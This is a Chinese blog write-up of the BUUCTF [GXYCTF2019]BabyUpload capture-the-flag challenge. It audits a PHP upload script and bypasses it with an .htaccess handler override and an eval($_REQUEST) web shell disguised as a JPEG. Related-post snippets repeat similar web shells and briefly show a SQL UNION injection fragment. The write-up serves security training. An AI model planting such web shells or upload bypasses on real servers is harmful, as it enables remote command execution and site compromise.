BUUCTF-[GXYCTF2019]BabyUpload

已于 2023-10-22 18:27:30 修改
阅读量627 收藏 2
点赞数 12
分类专栏: CTF-web 文章标签: 网络安全 安全
于 2023-10-19 17:43:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_61361405/article/details/133931348
版权
文章分析了一个PHP上传脚本,发现其存在安全漏洞,如未限制上传后缀和MIME类型检查不严。作者利用.htaccess文件绕过限制,展示了可能的攻击方式和获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

分析

首先,这是一道文件上传的题,题目给了GitHub的源码地址,那我就来进行代码审计。

<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> 
<title>Upload</title>
<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
上传文件<input type=\"file\" name=\"uploaded\" />
<input type=\"submit\" name=\"submit\" value=\"上传\" />
</form>";
error_reporting(0);
if(!isset($_SESSION['user'])){
    $_SESSION['user'] = md5((string)time() . (string)rand(100, 1000));
}
if(isset($_FILES['uploaded'])) {
    $target_path  = getcwd() . "/upload/" . md5($_SESSION['user']);
    $t_path = $target_path . "/" . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext  = substr($uploaded_name, strrpos($uploaded_name,'.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    $uploaded_tmp  = $_FILES['uploaded']['tmp_name'];
 
    if(preg_match("/ph/i", strtolower($uploaded_ext))){
        die("后缀名不能有ph!");
    }
    else{
        if ((($_FILES["uploaded"]["type"] == "
            ") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["uploaded"]["size"] < 2048)){
            $content = file_get_contents($uploaded_tmp);
            if(preg_match("/\<\?/i", $content)){
                die("诶,别蒙我啊,这标志明显还是php啊");
            }
            else{
                mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true);
                move_uploaded_file($uploaded_tmp, $t_path);
                echo "{$t_path} succesfully uploaded!";
            }
        }
        else{
            die("上传类型也太露骨了吧!");
        }
    }
}
?>

从代码中可以看出:

1、网站会将上传的文件保存到相应的目录下
2、网站会对后缀进行检测,不能有ph
3、网站会检测上传的MIME文件类型

首先这是个黑名单类型的文件上传,但是试了一下PHP、Phtml之类的都不行,所以把目光放在.htaccess和.user.ini之类的解析文件上。

从源码中可以看出,题目没有对.htaccess文件进行禁止,所以我直接上传.htaccess文件,然后将文件类型改为:Content-Type: image/jpeg

实战

首先先上传.htaccess文件

<FilesMatch "a.jpg">   
SetHandler application/x-httpd-php
</FilesMatch>

记得更改文件的MIME类型

然后再上传带有一句话木马的a.jpg文件

GIF89a?
<script language='php'>eval($_REQUEST['cmd']);</script>

上传成功,显示上传路径,访问一下:/upload/46b4a57b65914cdd85dfcee453c1995e/a.jpg

有回显,用蚁剑连起来,找到flag

[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)
oZuoShen123的博客
10-11 1070
1、上传一句话,提示“后缀不允许ph” 2、修改后缀为jpg,提示“上传类型也太露骨了吧!” 3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊” 4、修改一句话的标识为: @eval($_POST["pwd"]); 5、上传.htaccess
BUUCTF-WEB
ccfly1012的博客
11-02 4086
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
【学习笔记 41】 buu [GXYCTF2019]BabyUpload
weixin_43553654的博客
08-02 597
0x00 知识点 .htaccess文件上传绕过 0x01 知识点详解 请参考我上一篇学习笔记 0x02 解题思路 一看就知道是上传,尝试php3,phtml,普通一句话木马改后缀也不行,而且是添加了对文件的检测。 继续尝试利用.htaccess文件上传,首先上传一个.htaccess文件 <FilesMatch "flag.png"> SetHandler application/x-httpd-php </FilesMatch> 这里注意,这道题不知道为什么,我这
BUUCTF——[GXYCTF2019]BabyUpload
m_de_g的博客
04-17 762
【代码】BUUCTF——[GXYCTF2019]BabyUpload
[GXYCTF2019]BabyUpload1 通关记录
最新发布
2402_88178163的博客
03-19 863
所以他可能是存在对文本内容有后端检测这时我们尝试去掉一句话木马的一些东西比如<> <?上传后发现提示不能有ph 这时phtml php3 php5我们就不进行绕过考虑了 这时我们抓包进行分析看看是哪的问题 这里我们仅仅修改了上传名 改为了jpg后缀 他又给我们进行了报错但是我们可以发现报错内容和不改后缀之前存在不同。发现是可以上传成功的 但是这时候问题就来了 虽然我们成功上传了文件但是它是一个jpg后缀的文件 如果网页不存在文件包含漏洞我们直接访问文件位置 里面的代码是无法被直接解析的。
Excel中的xls、xlsx、xlsm混合文件,看我用Python如何统一处理......
pdcfighting的博客
02-07 420
点击上方“Python爬虫与数据挖掘”,进行关注回复“书籍”即可获赠Python从入门到进阶共10本电子书今日鸡汤洞房昨夜停红烛,待晓堂前拜舅姑。引言 Python语言,近几年在办公自动...
BUUCTF [GXYCTF2019]BabyUpload
weixin_45253622的博客
05-26 2114
文件上传题型。 直接上传一句话木马 可以看出是黑名单过滤, 想到上传.htaccess文件,然后上传图片马,getshell。 key.htaccess文件内容如下: AddType application/x-httpd-php .jpg 抓包修改文件名上传成功。 接着上传图片马,发现; 猜测过滤<?;修改一句话如下: <script language = 'php'>eval($_REQUEST[a]); </script> 构造...
【复习】BUUCTF:[GXYCTF2019]BabyUpload -- 对.htaccess的 包含自己和解析图片马为php文件都可以的 。。也算easy
Zero_Adam的博客
04-19 1267
一、自己做: 只需要更改Content-Type就能够绕过了,但是好像对文件内容有过滤。 那么,不能有? ,看看PHP的版本,看看能够用html的script进行绕过 能成功,看看能否解析。
【BUU】[GXYCTF2019]BabyUpload
qi_SJQ_的博客
02-07 851
1.本题知识: 图片尺寸小于2000字节,但对文件头没有检验。 检验content-type且只能为jp(e)g,png与gif都不行。 .htaccess配置文件替换。 过滤了一些敏感函数,以及php声明绕过,ph后缀过滤后好像没办法绕过去上传php文件。 2.别人的wp很详尽,我就对被拦截的情况来阐述吧: 后缀名不能有ph:我们后缀只能为jpg上传,但没有文件包含函数可以利用,图片马上传上去没用。因此就可以尝试.htaccess文件替换来将任意后缀解析为php。 AddType applicat
BUUCTF刷题系列
qq_45655564的博客
07-11 579
[HCTF 2018]WarmUp 查看网页源代码,得到source.php 可以得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 2077
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
[GXYCTF2019]BabyUpload
夜幕下的灯火阑珊的博客
05-13 3437
png文件不许上传,尝试上传jpg 修改后缀名为.htaccess,文件内容为 SetHandler application/x-httpd-php 上传一句话木马 <?php eval($_POST[cmd]);?> 失败,换一种方式 <script language='php'>eval($_POST[cmd]);</script> ...
BUUCTF:[GXYCTF2019]BabyUpload1
羽的博客
07-07 3382
文件上传漏洞。 不过这里我要吐槽一下,这个题首先他不允许传.png文件, 再者.jpg文件不能大,打了也报错,传不上去。 可想而知,我当时在做这个题的时候跟见了鬼一样难受,什么文件都传不了。 接着做题吧: 试着传一个PHP文件,告诉我不能传ph开头的文件后缀名,所以这里表示后端把所有php和php的别名都封死了。 根据之前upload-labs积累的绕过姿势,还可以上传.htaccess文件。 再次上传一句话木马时,又被拦截了,这里应该是后端检测了文件内容。盲猜检测<...
buuctf-BabyUpload
m0_62094846的博客
03-26 944
上传php文件,过滤后缀 上传jpg文件 上传png文件,和文件类型有关(Content-Type) 所以应该要上传jpg文件类型 上传一句话木马就会出现问题,筛查后发现是<?php 改一下木马格式就可以了 <script language="php">eval($_REQUEST[value])</script> 但是后缀无法修改成php类型,各种方式都试过了 想到.htaccess和.user.ini 和文件类型有关,就修...
BUUCTFBabyUpload[GXYCTF2019]
金 帛的博客
06-11 704
BUUCTF的wp
【CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 1143
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
BUUCTF学习笔记-BabyUpLoad
Emmawas的博客
09-28 790
考点:.htaccess绕过,文件内容为 AddType application/x-httpd-php .jpg,讲jpg文件按照php文件使用
[GXYCTF2019]BabySQli
02-13
### GXYCTF2019 BabySQli SQL Injection Challenge Solution In addressing the specific challenge named BabySQli from GXYCTF2019, understanding how to manipulate queries through injection techniques is crucial. The initial approach involves identifying a vulnerable point within an application's input handling mechanism where unfiltered user inputs can alter backend database commands. For this particular case, consider that the original query structure might resemble something similar to: ```sql SELECT id FROM products WHERE name = 'abcd' ``` An attacker could exploit such a scenario by injecting additional SQL code after `'abcd'`, effectively changing the logic and potentially revealing unintended data or bypassing authentication mechanisms[^1]. A crafted payload aiming at exploiting this vulnerability would look like: ```sql "' AND 1=2 UNION SELECT ... ``` This payload attempts to terminate the existing condition with `AND 1=2` ensuring it evaluates as false while introducing a new selection statement via `UNION`. This technique allows attackers to append their own select statements which may expose sensitive information depending on what columns are selected and tables involved. However, when dealing specifically with challenges designed around CTFs (Capture The Flag), there often exist constraints not present in real-world scenarios—such as limited table names or column counts—that must be considered during exploitation efforts. For instance, knowing whether certain keywords need encoding due to filters applied by developers before processing user-supplied parameters becomes essential knowledge for successfully completing these types of exercises. Moreover, regarding session-based functionalities mentioned elsewhere, altering another user’s records directly isn’t feasible since usernames derive from sessions rather than direct URL manipulations or form submissions[^2]. To mitigate risks associated with SQL injections across all applications including those found within competitive environments like CTF competitions, implementing robust validation checks alongside prepared statements significantly reduces attack surfaces[^3]: - Utilize parameterized queries instead of string concatenation. - Employ ORM frameworks whenever possible. - Regularly update dependencies and apply patches promptly.
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值